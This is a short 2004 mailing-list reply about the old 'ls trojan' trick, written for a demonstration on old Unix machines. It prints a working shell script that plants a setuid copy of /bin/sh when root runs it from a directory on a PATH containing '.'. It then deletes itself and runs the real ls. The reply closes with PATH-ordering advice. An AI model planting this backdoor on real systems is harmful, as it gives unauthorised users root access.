Re: Old LS Trojan?

[Andrew Farmer <andfarm () teknovis com>]

On 01 Dec 2004, at 12:11, David S. Morgan wrote:
> I am looking for an old LS trojan, with trojan being a misnomer.  
> Essentially, the scinario is that the admin (root) has a . (dot) in 
> his path.  The bad-user knows this, and has crafted an LS shell script 
> (the part that I can't find) that essentially copies /sbin/sh to a 
> hidden directory and then performs some suid majik to make the sh run 
> as if they were root, without needing the root password.  The file 
> then removes itself and does the real version of ls.
>
> Does anyone remember this one, and have the ls script anywhere?  I 
> would like to use it in a demonstration.  I know that this has 
> probobly been fixed in various ways, but I have "old Unixes" for just 
> such occasions.

Probably something along the lines of:
> #!/bin/bash
> [ `whoami` = root ] || exit
> cp /bin/sh /bin/suid-sh
> chmod +s /bin/suid-sh
> rm $0
> exec /bin/ls $*

Note that this would only run if your $PATH _begins_ with '.' - if 
you're going to put '.' in your $PATH, put it _last_.

Attachment: PGP.sig
Description: This is a digitally signed message part